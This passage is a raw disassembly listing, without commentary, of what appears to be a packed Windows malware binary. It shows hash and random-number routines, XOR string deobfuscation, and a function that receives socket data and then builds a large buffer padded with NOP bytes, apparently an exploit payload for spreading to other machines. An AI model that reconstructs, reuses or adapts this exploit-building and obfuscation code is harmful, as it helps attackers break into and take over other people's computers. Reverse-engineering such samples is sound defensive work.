mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
loc_41005C: ; DATA XREF: UPX1:off_41A8CC�o
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: UPX0:004168D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call ds:dword_417024 ; CryptAcquireContextA
push offset dword_41EBAC
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB0
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB4
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EBB8
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call ds:dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd ds:dword_41EBAC, eax
add eax, ebx
lock xadd ds:dword_41EBB0, eax
add eax, ecx
lock xadd ds:dword_41EBB4, eax
add eax, edx
lock xadd ds:dword_41EBB8, eax
add eax, esi
lock xadd ds:dword_41EBAC, eax
add eax, edi
lock xadd ds:dword_41EBB0, eax
add eax, ebp
lock xadd ds:dword_41EBB4, eax
add eax, esp
lock xadd ds:dword_41EBB8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd ds:dword_41EBAC, eax
lock xadd ds:dword_41EBB0, eax
lock xadd ds:dword_41EBB4, eax
lock xadd ds:dword_41EBB8, eax
add ecx, ebx
ror ebx, cl
lock xadd ds:dword_41EBB4, ebx
add ecx, ecx
ror ecx, cl
lock xadd ds:dword_41EBB0, ecx
add ecx, edx
ror edx, cl
lock xadd ds:dword_41EBAC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd ds:dword_41EBB8, edx
lock xadd ds:dword_41EBB4, ecx
lock xadd ds:dword_41EBB0, ebx
lock xadd ds:dword_41EBAC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBB0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd ds:dword_41EBAC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: UPX0:004168E1�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EBC0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EBC0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, ds:byte_41EBC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, ds:byte_41EBC0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: UPX1:off_41CDAE�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
